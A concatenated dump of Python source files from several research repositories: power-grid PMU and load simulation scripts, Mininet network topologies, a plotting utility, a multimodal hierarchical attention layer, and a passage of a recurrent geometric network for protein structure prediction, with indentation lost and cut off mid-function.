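    #   phnmr,3
    #   ip,192.168.1.2
    #   data_rate,30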
with open(filename, 'r') as config:
phnmr = 0
annmr = 0
dgnmr = 0
data_format = 0
chna = ''
fnom = 0
message_time_quality = 0
phuni = []
anuni = []
diguni = []
for line in config:
line_split = line.split(',')
if line_split[0] == 'idcode':
idcode=int(line_split[1])
elif line_split[0] == 'stn':
stn = line_split[1].encode('utf-8')
elif line_split[0] == 'phnmr':
phnmr = int(line_split[1])
elif line_split[0] == 'annmr':
annmr = int(line_split[1])
elif line_split[0] == 'dgnmr':
dgnmr = int(line_split[1])
elif line_split[0] == 'chnam':
for x in range(1,1+dgnmr*16+annmr+phnmr):
new_d = pad(line_split[x],16)
chna += new_d
chnam = chna.encode('utf-8')
elif line_split[0] == 'fnom':
if line_split[1] == '50':
fnom = 1
elif line_split[0] == 'ip':
IP = line_split[1].encode('utf-8')
elif line_split[0] == 'data_format':
if line_split[1] == 'float':
data_format += 8
if line_split[2] == 'float':
data_format += 4
if line_split[3] == 'float':
data_format += 2
if line_split[4] == 'polar':
data_format += 1
elif line_split[0] == 'port':
port = ((line_split[1]))
elif line_split[0] == 'phunit':
for x in range(1,phnmr+1):
phuni.append(c_int(int(line_split[x])))
elif line_split[0] == 'anunit':
for x in range(1,annmr+1):
anuni.append(c_int(int(line_split[x])))
elif line_split[0] == 'digunit':
for x in range(1,dgnmr+1):
diguni.append(c_int(int(line_split[x])))
elif line_split[0] == 'cfgcnt':
cfgcnt = int(line_split[1])
elif line_split[0] == 'data_rate':
data_rate = int(line_split[1])
elif line_split[0] == 'time_base':
time_base = int(line_split[1])
phunit = (c_int*len(phuni))(*phuni)
anunit = (c_int*len(anuni))(*anuni)
digunit = (c_int*len(diguni))(*diguni)
pmu = PMU(idcode, message_time_quality,
stn, data_format, phnmr,
annmr, dgnmr, chnam, phunit, None, None,
fnom, cfgcnt, data_rate, time_base, IP, 4712)
return pmu
def data_process(raw_data, pmu):#phnmr, annmr, dgnmr, freq, dfreq):
data = raw_data.split()
phasor_data = []
analog_data = []
digital_data = []
for x in range(0, pmu.phnmr*2):
phasor_data.append(float(data[x]))
for x in range(pmu.phnmr*2, pmu.phnmr *2 + pmu.annmr):
analog_data.append(float(data[x]))
for x in range(pmu.phnmr *2 + pmu.annmr, pmu.phnmr*2 + pmu.annmr + pmu.dgnmr):
        digital_data.append(float(data[x]))
freq = float(data[pmu.phnmr*2+pmu.annmr+pmu.dgnmr])
dfreq = float(data[pmu.phnmr*2+pmu.annmr+pmu.dgnmr+1])
ph_data = (c_float*len(phasor_data))(*phasor_data)
an_data = (c_float*len(analog_data))(*analog_data)
dg_data = (c_float*len(digital_data))(*digital_data)
freq_data = (c_float)(freq)
dfreq_data = (c_float)(dfreq)
return ph_data, an_data, dg_data, freq_data, dfreq_data
def pad(d,size):
data=d
room = size-len(data)
if room > 0:
for x in range(room):
data+=' '
elif room < 0:
        data = data[:size]
return data
#scheduler function
def do_every(interval, worker_func, iterations = 0):
if iterations !=1:
threading.Timer (interval,do_every, [interval, worker_func, 0 if iterations == 0 else iterations-1]
).start()
worker_func()
def request_data():
update = ('update b p pre_pmu post_pmu %s a1 0\n'% time.time())
pipe.send_sync_event(update.encode('UTF-8'), pipin)
pmu = read_pmu('./models/pmu.config')
_cfg2(pmu)
do_every(0.3,request_data)
while 1:
raw_message=pipe.listen(pipout)
if raw_message:
message=raw_message[0]
if message[0] == 'cfg2':
_cfg2(pmu)
else:
raw_data = raw_message
#raw_data = '7199.36 0.1 7199.37 -2.27 7199.36 2.27 334.51 -0.6225 59.9 0.01'
phasor_data, analog_data, digital_data, freq_data, dfreq_data = data_process(raw_data,pmu)
_data(pmu, phasor_data, analog_data, digital_data, freq_data, dfreq_data)
print('Sent')
```
#### File: models/tomacs_use/load.py
```python
# get value from opendss
# send value of load to control center
import pipe
import sys
import time
import threading
import zmq
import os
import logging
TIME_INT = 0.15
Load_ID = sys.argv[1]
server_IP = sys.argv[2]
server_Port = sys.argv[3]
contextOut = zmq.Context()
clientOut = contextOut.socket(zmq.REQ)
clientOut.connect("tcp://%s:%s" % (server_IP,server_Port))
# open pipe to communicate to opendss
logging.basicConfig(filename='%s.log'%Load_ID,level=logging.DEBUG)
pipeout = pipe.setup_pipe_l(Load_ID)
pipin = pipe.setup_pipe_w()
# send to control center
def send_cc(val):
logging.debug('sending %s to cc at time %s'%(val,time.time()))
val = '%s %s'%(Load_ID,val)
req_bytes = val.encode('utf-8')
clientOut.send(req_bytes)
status=clientOut.recv()
logging.debug('reply at %s' %time.time())
def get_val():
update = 'update b p get_load_value post_get_load_value %s %s 0\n' %(time.time(),Load_ID)
pipe.send_sync_event(update.encode('UTF-8'), pipin)
while 1:
time.sleep(TIME_INT)
get_val()
x = pipe.listen(pipeout)
if x:
logging.debug(x)
send_cc(x)
``` |
{
"source": "JinLabIIT/VirtualTimeKernel",
"score": 3
} |
#### File: mininet/mininet/topolib.py
```python
"Library of potentially useful topologies for Mininet"
from mininet.topo import Topo
from mininet.net import Mininet
# The build() method is expected to do this:
# pylint: disable=arguments-differ
class TreeTopo( Topo ):
"Topology for a tree network with a given depth and fanout."
def build( self, depth=1, fanout=2 ):
# Numbering: h1..N, s1..M
self.hostNum = 1
self.switchNum = 1
# Build topology
self.addTree( depth, fanout )
def addTree( self, depth, fanout ):
"""Add a subtree starting with node n.
returns: last node added"""
isSwitch = depth > 0
if isSwitch:
node = self.addSwitch( 's%s' % self.switchNum )
self.switchNum += 1
for _ in range( fanout ):
child = self.addTree( depth - 1, fanout )
self.addLink( node, child )
else:
node = self.addHost( 'h%s' % self.hostNum )
self.hostNum += 1
return node
def TreeNet( depth=1, fanout=2, **kwargs ):
"Convenience function for creating tree networks."
topo = TreeTopo( depth, fanout )
return Mininet( topo, **kwargs )
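# Example (hypothetical usage): a depth-2, fanout-2 tree (4 hosts, 3 switches)
#   net = TreeNet( depth=2, fanout=2 )
#   net.start()
#   net.pingAll()
#   net.stop()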
class TorusTopo( Topo ):
"""2-D Torus topology
WARNING: this topology has LOOPS and WILL NOT WORK
with the default controller or any Ethernet bridge
without STP turned on! It can be used with STP, e.g.:
# mn --topo torus,3,3 --switch lxbr,stp=1 --test pingall"""
def build( self, x, y, n=1 ):
"""x: dimension of torus in x-direction
y: dimension of torus in y-direction
n: number of hosts per switch"""
if x < 3 or y < 3:
raise Exception( 'Please use 3x3 or greater for compatibility '
'with 2.1' )
if n == 1:
genHostName = lambda loc, k: 'h%s' % ( loc )
else:
genHostName = lambda loc, k: 'h%sx%d' % ( loc, k )
hosts, switches, dpid = {}, {}, 0
# Create and wire interior
for i in range( 0, x ):
for j in range( 0, y ):
loc = '%dx%d' % ( i + 1, j + 1 )
# dpid cannot be zero for OVS
dpid = ( i + 1 ) * 256 + ( j + 1 )
switch = switches[ i, j ] = self.addSwitch(
's' + loc, dpid='%x' % dpid )
for k in range( 0, n ):
host = hosts[ i, j, k ] = self.addHost( genHostName( loc, k + 1 ) )
self.addLink( host, switch )
# Connect switches
for i in range( 0, x ):
for j in range( 0, y ):
sw1 = switches[ i, j ]
sw2 = switches[ i, ( j + 1 ) % y ]
sw3 = switches[ ( i + 1 ) % x, j ]
self.addLink( sw1, sw2 )
self.addLink( sw1, sw3 )
# pylint: enable=arguments-differ
```
#### File: VirtualTimeKernel/vt_userspace/plot_avg.py
```python
import numpy as np
import matplotlib.pyplot as plt
import argparse
def plot_err(data1, data2):
err_data = []
for x, y in zip(data1, data2):
e = abs(x - y * dilation)
if e < 1:
e = 1
err_data.append(e)
print err_data
fig = plt.figure()
plt.plot(data1, err_data, '--b^')
plt.xlabel('Duration / Microseconds')
plt.ylabel('Error / Microseconds')
plt.grid(True)
ax = fig.add_subplot(1, 1, 1)
ax.set_xscale('log')
ax.set_yscale('log')
# major_ticks = np.arange(0, 1.1 * max(err_data), max(err_data) / 10)
# ax.set_yticks(major_ticks)
# plt.ylim(0, 1.1 * max(err_data))
plt.savefig(output_filename, format='eps')
def import_data(data1, data2):
data = np.loadtxt(input_filename)
for x in data:
data1.append(float(x[0]))
data2.append(float(x[1]))
def main():
data1 = []
data2 = []
import_data(data1, data2)
plot_err(data1, data2)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--input', action='store', dest='input_filename')
parser.add_argument('--output', action='store', dest='output_filename')
parser.add_argument('--dilation', action='store', dest='dilation')
results = parser.parse_args()
input_filename = results.input_filename
output_filename = results.output_filename
dilation = int(results.dilation)
main()
``` |
{
"source": "jinlafan/mmt-dropnet",
"score": 2
} |
#### File: layers/attention/hierarchical.py
```python
import random
import torch
from torch import nn
from ...utils.nn import get_activation_fn
# <NAME>., & <NAME>. (2017). Attention Strategies for Multi-Source
# Sequence-to-Sequence Learning. In Proceedings of the 55th Annual Meeting of
# the Association for Computational Linguistics (Volume 2: Short Papers)
# (Vol. 2, pp. 196-202). [Code contributed by @jlibovicky]
class HierarchicalAttention(nn.Module):
"""Hierarchical attention over multiple modalities."""
def __init__(self, ctx_dims, hid_dim, mid_dim, att_activ='tanh', dropnet=False, \
dropnet_image_rate=0.15, dropnet_text_rate=0.15):
super().__init__()
self.activ = get_activation_fn(att_activ)
self.ctx_dims = ctx_dims
self.hid_dim = hid_dim
self.mid_dim = mid_dim
self.dropnet = dropnet
self.dropnet_image_rate = dropnet_image_rate
self.dropnet_text_rate = dropnet_text_rate
self.ctx_projs = nn.ModuleList([
nn.Linear(dim, mid_dim, bias=False) for dim in self.ctx_dims])
self.dec_proj = nn.Linear(hid_dim, mid_dim, bias=True)
self.mlp = nn.Linear(self.mid_dim, 1, bias=False)
def forward(self, contexts, hid):
# contexts[0] --> textual context
# contexts[1] --> visual context
dec_state_proj = self.dec_proj(hid)
ctx_projected = torch.cat([
p(ctx).unsqueeze(0) for p, ctx
in zip(self.ctx_projs, contexts)], dim=0)
energies = self.mlp(self.activ(dec_state_proj + ctx_projected))
att_dist = nn.functional.softmax(energies, dim=0)
ctxs_cat = torch.cat([c.unsqueeze(0) for c in contexts])
# dropnet mechanism
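        # When dropnet is enabled during training: with probability dropnet_image_rate
        # the visual context is dropped (text only), with probability dropnet_text_rate
        # the textual context is dropped (image only), and otherwise the attention-weighted
        # sum fuses both. At evaluation time both modalities are always fused.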
if self.training == True:
if self.dropnet == True:
x = random.choices([0, 1, 2], k=1, weights=[self.dropnet_image_rate, \
self.dropnet_text_rate, 1-self.dropnet_image_rate-self.dropnet_text_rate])[0]
# use only textual context
if x == 0:
joint_context = (att_dist * ctxs_cat)[0]
# use only image context
elif x == 1:
joint_context = (att_dist * ctxs_cat)[1]
# use both visual and textual contexts (i.e. multimodal context)
else:
joint_context = (att_dist * ctxs_cat).sum(0)
else:
joint_context = (att_dist * ctxs_cat).sum(0)
else:
joint_context = (att_dist * ctxs_cat).sum(0)
return att_dist, joint_context
``` |
{
"source": "Jinli213/csye6225-fall2017",
"score": 2
} |
#### File: infrastructure/gcp/sql-template.py
```python
def GenerateConfig(context):
"""Creates the SQL instance."""
resources = [{
'name': 'csye6225-cloud-sql',
'type': 'sqladmin.v1beta4.instance',
'properties': {
"state":"RUNNABLE",
"backendType": "SECOND_GEN",
"databaseVersion": "MYSQL_5_6",
"region": "us-east1",
"settings": {
"tier": "db-n1-standard-1",
"dataDiskSizeGb": 10,
"dataDiskType": "PD_SSD",
},
"instanceType": "CLOUD_SQL_INSTANCE",
}
}]
return {'resources': resources}
``` |
{
"source": "JinLi711/quantum_circuits",
"score": 3
} |
#### File: quantum_circuits/quantum_circuits/gates.py
```python
from sympy import *
import utils
class Gate(object):
"""Gate class for quantum operations.
Attributes:
name (str): name of the gate
indexes (int or list of ints): indexes to perform the quantum gate on
gate (sympy Matrix): gate operation
template (str): template for OpenQASM conversion code
"""
def __init__(self, name, indexes, gate, template):
self.name = name
self.indexes = indexes
self.gate = gate
self.template = template
def __call__(self):
return self.gate
def __repr__(self):
return 'Gate.' + self.name + '_gate'
class U3_gate(Gate):
def __init__(self, phi, theta, lambda_, indexes=None):
self.phi = phi
self.theta = theta
self.lambda_ = lambda_
gate = Matrix([
[E ** (-I * (phi + lambda_) / 2.0) * cos(theta / 2.0),
-E ** (-I * (phi - lambda_) / 2.0) * sin(theta / 2.0)],
[E ** (I * (phi - lambda_) / 2.0) * sin(theta / 2.0),
E** (I * (phi + lambda_) / 2.0) * cos(theta / 2.0)]
])
template = 'u3({},{},{}) q[{}]'.format(theta, phi, lambda_, indexes)
Gate.__init__(self, 'U3', indexes, gate, template)
class U2_gate(Gate):
def __init__(self, phi, lambda_, indexes=None):
self.phi = phi
self.lambda_ = lambda_
gate = U3_gate(phi, pi / 2.0, lambda_)()
template = 'u2({},{}) q[{}]'.format(phi, lambda_, indexes)
Gate.__init__(self, 'U2', indexes, gate, template)
class U1_gate(Gate):
def __init__(self, lambda_, indexes=None):
self.lambda_ = lambda_
gate = exp(0.5*I*lambda_) * U3_gate(0.0, 0.0, lambda_)()
template = 'u1({}) q[{}]'.format(lambda_, indexes)
Gate.__init__(self, 'U1', indexes, gate, template)
class RX_gate(Gate):
def __init__(self, theta, indexes=None):
self.theta = theta
gate = Matrix(simplify(U3_gate(-pi / 2.0, theta, pi / 2.0)()))
template = 'rx({}) q[{}]'.format(theta, indexes)
Gate.__init__(self, 'RX', indexes, gate, template)
class RY_gate(Gate):
def __init__(self, theta, indexes=None):
self.theta = theta
gate = Matrix(simplify(U3_gate(0.0, theta, 0.0)()))
template = 'ry({}) q[{}]'.format(theta, indexes)
Gate.__init__(self, 'RY', indexes, gate, template)
class RZ_gate(Gate):
def __init__(self, theta, indexes=None):
self.theta = theta
gate = Matrix(simplify(U1_gate(theta)()))
template = 'rz({}) q[{}]'.format(theta, indexes)
Gate.__init__(self, 'RZ', indexes, gate, template)
class ID_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(U3_gate(0, 0, 0)() ))
template = 'id q[{}]'.format(indexes)
Gate.__init__(self, 'ID', indexes, gate, template)
class X_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(I * U3_gate(0, pi, pi)() ))
template = 'x q[{}]'.format(indexes)
Gate.__init__(self, 'X', indexes, gate, template)
class Y_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(-I * U3_gate(pi / 2, pi, pi/ 2)() ))
template = 'y q[{}]'.format(indexes)
Gate.__init__(self, 'Y', indexes, gate, template)
class Z_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify( U1_gate(pi)() ))
template = 'z q[{}]'.format(indexes)
Gate.__init__(self, 'Z', indexes, gate, template)
class H_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(I * U2_gate(0, pi)() ))
template = 'h q[{}]'.format(indexes)
Gate.__init__(self, 'H', indexes, gate, template)
class S_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(U1_gate(pi / 2)() ))
template = 's q[{}]'.format(indexes)
Gate.__init__(self, 'S', indexes, gate, template)
class SDG_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(U1_gate(-pi / 2)() ))
template = 'sdg q[{}]'.format(indexes)
Gate.__init__(self, 'SDG', indexes, gate, template)
class T_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(U1_gate(pi / 4)() ))
template = 't q[{}]'.format(indexes)
Gate.__init__(self, 'T', indexes, gate, template)
class TDG_gate(Gate):
def __init__(self, indexes=None):
gate = Matrix(simplify(U1_gate(-pi / 4)() ))
template = 'tdg q[{}]'.format(indexes)
Gate.__init__(self, 'TDG', indexes, gate, template)
class CX_gate(Gate):
def __init__(self, indexes=[None, None]):
        gate = Matrix([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, 1],
[0, 0, 1, 0]
])
template = 'cx q[{}], q[{}]'.format(indexes[0], indexes[1])
Gate.__init__(self, 'CX', indexes, gate, template)
class CCX_gate(Gate):
def __init__(self, indexes=[None, None, None]):
# if cx gate restriction is lifted, we can implement
# the gate in terms of built in gates
gate = Matrix([
[1, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0],
])
# I = I_gate().gate
# H = H_gate().gate
# CX = CX_gate().gate
# T = T_gate().gate
# TDG = TDG_gate().gate
template = 'ccx q[{}], q[{}], q[{}]'.format(
indexes[0],
indexes[1],
indexes[2])
Gate.__init__(self, 'CCX', indexes, gate, template)
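# --- Editor's note: a minimal usage sketch, not part of the original file. It assumes the
# sympy names used by the gate definitions above (Matrix, E, I, pi, ...) are imported at the
# top of this module. Each gate object carries both its unitary (via __call__) and the
# OpenQASM line that describes it:
#   h = H_gate(indexes=0)
#   h()          # 2x2 sympy Matrix for the Hadamard gate
#   h.template   # 'h q[0]'
#   cx = CX_gate(indexes=[0, 1])
#   cx.template  # 'cx q[0], q[1]'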
```
#### File: quantum_circuits/quantum_circuits/measurements.py
```python
from sympy import *
import numpy as np
import utils
class Measure(object):
def __init__(self, qubit_index, bit_index):
self.template = 'measure q[{}] -> c[{}]'.format(qubit_index, bit_index)
def measure(qubits, basis='z'):
"""Perform a measurement on the qubits.
Args:
qubits (list): list of qubit.Qubit
basis (str): basis used to measure the qubits
Returns:
(str) binary representation of the resulting measurement
"""
if basis == 'z':
qubits = utils.sp_to_np(qubits)
size = qubits.shape[0]
# randomly select the measured bits based on the amplitudes
probabilities = np.absolute(qubits).flatten() ** 2
random_choice = np.random.choice(size, p=probabilities)
binary_choice = utils.int_to_binary(random_choice, int(np.log2(size)))
return binary_choice
else:
raise ValueError('This is not a correct basis measurement.')
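# --- Editor's note: a hedged usage sketch, not part of the original file. It assumes the
# state is a normalized sympy Matrix and that utils.sp_to_np flattens it to a numpy array.
# Measuring a two-qubit equal superposition in the z basis returns one of '00', '01',
# '10', '11', each with probability 0.25:
#   state = Matrix([1, 1, 1, 1]) / 2
#   measure(state)           # e.g. '10'
#   Measure(0, 0).template   # 'measure q[0] -> c[0]'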
``` |
{
"source": "JinLi711/UTGN",
"score": 3
} |
#### File: UTGN/model/model.py
```python
import os
from glob import glob
from copy import deepcopy
from itertools import zip_longest
import numpy as np
import tensorflow as tf
import tensorflow.contrib.layers as layers
from tensorflow.python.ops import control_flow_ops
from geom_ops import *
from net_ops import *
from utils import *
import rnn
import transformer
# Public interface
SCOPE = 'RGN'
DUMMY_LOSS = -1.
LOSS_SCALING_FACTOR = 0.01 # this is to convert recorded losses to angstroms
class RGNModel(object):
"""Recurrent geometric network model
Attributes:
mode: train or predict
config: parameter dictionary
"""
# static variable to control creation of new objects and starting the model
_is_started = False
# ??? Should this be called model number not number of models?
_num_models = 0
def __init__(self, mode, config):
"""Sets up configurations and invokes the TF graph. """
# Make sure model hasn't been started.
if not RGNModel._is_started:
self.mode = mode
self.config = deepcopy(config)
# Set up public methods based on mode (for initial state).
if mode == 'training':
self.start = self._start
else:
self.evaluate = self._evaluate
self.predict = self._predict
# Process config for derived properties
io = self.config.io
arch = self.config.architecture
reg = self.config.regularization
curr = self.config.curriculum
opt = self.config.optimization
init = self.config.initialization
# Test for correct curriculum configuration
if curr['mode'] is None and curr['behavior'] is not None:
raise RuntimeError(
'Must set curriculum mode if curriculum behavior is set.')
elif curr['mode'] is not None and curr['behavior'] is None:
raise RuntimeError(
'Must set curriculum behavior if curriculum mode is set.')
# model name
if io['name'] is None:
io['name'] = 'model_' + str(RGNModel._num_models)
RGNModel._num_models = RGNModel._num_models + 1
# ??? what does this file contain?
# alphabet-related
arch['alphabet'] = np.loadtxt(io['alphabet_file'], delimiter = ',')[:, 6:] \
if io['alphabet_file'] is not None else None
# set alphabet size if implicit
if arch['alphabet'] is not None:
arch['alphabet_size'] = len(arch['alphabet'])
# having multiple alphabets is isomorphic to not reusing alphabet
arch['single_or_no_alphabet'] = type(arch['alphabet_size']) is not list
arch['is_alphabetized'] = 'alphabet' in arch['tertiary_output']
# angularization
arch['is_angularized'] = 'angular' in arch['tertiary_output']
# optimization
if opt['optimizer'] == 'adadelta':
opt.update({'rho': opt['decay']})
# initialization
if arch['higher_order_layers']:
for key in ['recurrent_init']:
if type(init[key]) is not list:
init[key] = [init[key]] * len(arch['recurrent_layer_size'])
if arch['recurrent_nonlinear_out_proj_size'] is not None:
for key in ['recurrent_nonlinear_out_proj_init']:
if type(init[key]) is not list:
init[key] = [init[key]] * len(arch['recurrent_nonlinear_out_proj_size'])
# regularization
for key in ['recurrent_input_keep_probability',
'recurrent_output_keep_probability',
'recurrent_keep_probability',
'recurrent_state_zonein_probability',
'recurrent_memory_zonein_probability',
'alphabet_keep_probability',
'alphabet_normalization']:
if type(reg[key]) is not list:
reg[key] = [reg[key]] * len(arch['recurrent_layer_size'])
# create graph
self._create_graph(mode, self.config)
else:
raise RuntimeError('Model already started; cannot create new objects.')
def _create_graph(self, mode, config):
"""Creates TensorFlow computation graph depending on the mode.
Builds the head (training) graph to start, train, and checkpoint a model.
Or create any number of 'evaluation' models that depend on the head model,
but with additional data sets, different model semantics (e.g. no dropout)
for the evaluation, and logging of their performance.
Two types of internal variables stored in each object:
ops collections, like training_ops, evaluation_ops, etc.
As the graph is built up, ops are added to these lists.
various nodes that are like TF methods, like the initializer, saver, etc,
which are stored in the object and are accessed by various methods when necessary.
Args:
mode: training or predicting
config: dictionary of configuration parameters
"""
# set up appropriate op collections based on mode (for initial state)
if mode == 'training':
# collection of ops to be run at each step of training
self._training_ops = training_ops = {}
# collection of ops for diagnostics like weight norms and curriculum quantiles
self._diagnostic_ops = diagnostic_ops = {}
else:
# collection of ops for evaluation of losses
self._evaluation_ops = evaluation_ops = {}
# collection of ops for the last evaluation in a multi-invocation evaluation
self._last_evaluation_ops = last_evaluation_ops = {}
# collection of ops for prediction of structures
self._prediction_ops = prediction_ops = {}
# set variable scoping, op scoping, and place on appropriate device
with tf.variable_scope(SCOPE, reuse=(mode == 'evaluation')) as scope, \
tf.name_scope(SCOPE + '/' + config.io['name'] + '/'), \
tf.device(_device_function_constructor(
**{k: config.computing[k] for k in ('functions_on_devices', 'default_device')})):
# set graph seed
if mode == 'training':
tf.set_random_seed(config.initialization['graph_seed'])
# Create curriculum state and tracking variables if needed.
if config.curriculum['mode'] is not None:
# Variable to hold current curriculum iteration
curriculum_step = tf.get_variable(
name='curriculum_step',
shape=[],
trainable=False,
initializer=tf.constant_initializer(config.curriculum['base']))
if mode == 'training':
diagnostic_ops.update({'curriculum_step': curriculum_step})
# Set up data ports
if mode == 'training':
self._coordinator = tf.train.Coordinator()
if config.curriculum['mode'] == 'length':
max_length = tf.reduce_min(
[curriculum_step, config.optimization['num_steps']])
max_length = tf.cast(max_length, tf.int32)
else:
max_length = config.optimization['num_steps']
dataflow_config = merge_dicts(
config.io,
config.initialization,
config.optimization,
config.queueing)
ids, primaries, evolutionaries, secondaries, tertiaries, \
masks, num_stepss = _dataflow(dataflow_config, max_length)
# Set up inputs
inputs = _inputs(
merge_dicts(config.architecture, config.initialization),
primaries,
evolutionaries)
# Compute dRMSD weights
# Masks out meaningless (longer than sequence) pairwise distances
# Incorporates curriculum weights
weights_config = merge_dicts(
config.optimization,
config.curriculum,
config.loss,
config.io)
weights, flat_curriculum_weights = _weights(
weights_config,
masks,
curriculum_step if config.curriculum['mode'] == 'loss' else None)
if mode == 'training' and config.curriculum['mode'] == 'loss':
diagnostic_ops.update({'flat_curriculum_weights': flat_curriculum_weights})
# create alphabet if needed and if it will be shared between layers,
# otherwise set to None so that _dihedrals takes care of it
alphabet_config = merge_dicts(
config.architecture,
config.initialization)
if alphabet_config['is_alphabetized'] \
and alphabet_config['single_or_no_alphabet']:
alphabet = _alphabet(mode, alphabet_config)
if mode == 'training' and config.io['log_alphabet']:
diagnostic_ops.update({'alphabet': alphabet})
else:
alphabet = None
for case in switch(config.architecture['internal_representation']):
if case('transformer'):
transformer_config = merge_dicts(
config.initialization,
config.architecture,
config.regularization,
config.optimization)
inputs2 = tf.transpose(inputs, perm=[1,0,2])
recurrent_outputs = transformer._encoder_model(
inputs2,
transformer_config,
mode
)
recurrent_outputs = tf.transpose(
recurrent_outputs,
perm=[1,0,2])
elif case('recurrent'):
# Create recurrent layer(s) that translate
# primary sequences into internal representation
recurrence_config = merge_dicts(
config.initialization,
config.architecture,
config.regularization,
config.optimization,
config.computing, config.io)
# inputs: [NUM_STEPS, BATCH_SIZE, RECURRENT_LAYER_SIZE]
# recurrent_outputs: [NUM_STEPS, BATCH_SIZE, RECURRENT_LAYER_SIZE]
recurrent_outputs, recurrent_states = rnn._higher_recurrence(
mode,
recurrence_config,
inputs,
num_stepss,
alphabet=alphabet)
elif case('none'):
recurrent_outputs = inputs
else:
raise ValueError('Not an available internal representation.')
# Tertiary structure generation
if config.loss['tertiary_weight'] > 0:
# Convert internal representation to
# (thru some number of possible ways) dihedral angles
dihedrals_config = merge_dicts(
config.initialization,
config.optimization,
config.architecture,
config.regularization,
config.io)
dihedrals_config.update({
k: dihedrals_config[k][-1] for k in [
'alphabet_keep_probability',
'alphabet_normalization']})
if not dihedrals_config['single_or_no_alphabet']:
dihedrals_config.update({
'alphabet_size': dihedrals_config['alphabet_size'][-1]})
dihedrals = _dihedrals(
mode,
dihedrals_config,
recurrent_outputs,
alphabet=alphabet)
# Convert dihedrals into full 3D structures and compute dRMSDs
coordinates = _coordinates(
merge_dicts(
config.computing,
config.optimization,
config.queueing),
dihedrals)
drmsds = _drmsds(
merge_dicts(
config.optimization,
config.loss,
config.io),
coordinates,
tertiaries,
weights)
if mode == 'evaluation':
prediction_ops.update({
'ids': ids,
'coordinates': coordinates,
'num_stepss': num_stepss,})
# 'recurrent_states': recurrent_states})
# Losses
if config.loss['include']:
filters = {grp: id_filter(ids, grp) \
for grp in config.io['evaluation_sub_groups']} \
if mode == 'evaluation' else {}
filters.update({'all': tf.tile([True], tf.shape(ids))})
for group_id, group_filter in filters.items():
with tf.variable_scope(group_id):
# Tertiary loss
effective_tertiary_loss = 0.
if config.loss['tertiary_weight'] > 0:
if config.queueing['num_evaluation_invocations'] > 1 \
and mode == 'training':
raise RuntimeError('Cannot use multiple invocations with training mode.')
else:
# Compute tertiary loss quotient parts by reducing dRMSDs
# based on normalization behavior
tertiary_loss_numerator, tertiary_loss_denominator = _reduce_loss_quotient(
merge_dicts(config.loss, config.io, config.optimization),
drmsds,
masks,
group_filter,
name_prefix='tertiary_loss')
# Handles multiple invocations and gracefully degrades for single invocations.
                                # Variables are created below _per_ evaluation model, which is a
                                # deviation from my general design; the scope of those variables
                                # is the evaluation model's, _not_ the training model's as usual.
tertiary_loss, min_loss_achieved, min_loss_op, \
update_accu_op, reduce_accu_op = _accumulate_loss(
merge_dicts(config.io, config.queueing),
tertiary_loss_numerator,
tertiary_loss_denominator,
name_prefix='tertiary_loss')
if mode == 'evaluation':
evaluation_ops.update({
'update_accumulator_' + group_id + '_op': update_accu_op})
last_evaluation_ops.update({
'tertiary_loss_' + group_id: tertiary_loss * LOSS_SCALING_FACTOR,
'reduce_accumulator_' + group_id + '_op': reduce_accu_op,
'min_tertiary_loss_achieved_' + group_id: min_loss_achieved * LOSS_SCALING_FACTOR,
'min_tertiary_loss_' + group_id + '_op': min_loss_op})
if config.io['log_model_summaries']:
tf.add_to_collection(
config.io['name'] + '_tertiary_losses',
tertiary_loss)
effective_tertiary_loss = config.loss['tertiary_weight'] * tertiary_loss
# Final loss and related housekeeping
loss = tf.identity(effective_tertiary_loss, name='loss')
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) # batch_norm related
if update_ops:
loss = control_flow_ops.with_dependencies(
tf.tuple(update_ops),
loss)
if config.io['log_model_summaries']:
tf.add_to_collection(
config.io['name'] + '_losses',
loss)
if group_id == config.curriculum['loss_history_subgroup']:
curriculum_loss = loss
# Curriculum loss history; not always used but design
# is much cleaner if always created.
curriculum_loss_history = tf.get_variable(
initializer=tf.constant_initializer([DUMMY_LOSS] \
* config.curriculum['change_num_iterations']),
shape=[config.curriculum['change_num_iterations']],
trainable=False,
name='curriculum_loss_history')
if mode == 'evaluation' and config.curriculum['update_loss_history']:
update_curriculum_history_op = _history(
config.io,
curriculum_loss,
curriculum_loss_history)
last_evaluation_ops.update({
'update_curriculum_history_op': update_curriculum_history_op})
# Training
if mode == 'training':
# get grads, training ops
self._global_step, minimize_op, grads_and_vars_dict = _training(
config.optimization, loss)
self._grads_and_vars_length = len(grads_and_vars_dict) // 2
# update relevant op dicts
# update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
# if update_ops:
# training_ops.update({'update_ops': tf.tuple(update_ops)})
training_ops.update({
'minimize_op': minimize_op,
'global_step': self._global_step,
'ids': ids})
diagnostic_ops.update(grads_and_vars_dict)
# Curriculum
if mode == 'training' \
and config.curriculum['behavior'] in [
'fixed_rate',
'loss_threshold',
'loss_change']:
curriculum_update_op = _curriculum(
config.curriculum,
curriculum_step,
curriculum_loss_history,
[minimize_op])
training_ops.update({
'curriculum_update_op': curriculum_update_op})
def _train(self, session):
"""Performs one iteration of training.
If applicable, advances the curriculum.
Args:
session: tf session
Returns:
global step
ids
"""
training_dict = ops_to_dict(session, self._training_ops)
return training_dict['global_step'], training_dict['ids']
def _evaluate(self, session, pretty=True):
"""Evaluates loss(es) and returns dicts with the relevant loss(es).
Args:
session: tf session
pretty: pretty print
Returns:
evaluation dict
"""
if RGNModel._is_started:
# evaluate
num_invocations = self.config.queueing['num_evaluation_invocations']
for invocation in range(num_invocations):
if invocation < num_invocations - 1:
evaluation_dict = ops_to_dict(
session,
self._evaluation_ops)
else:
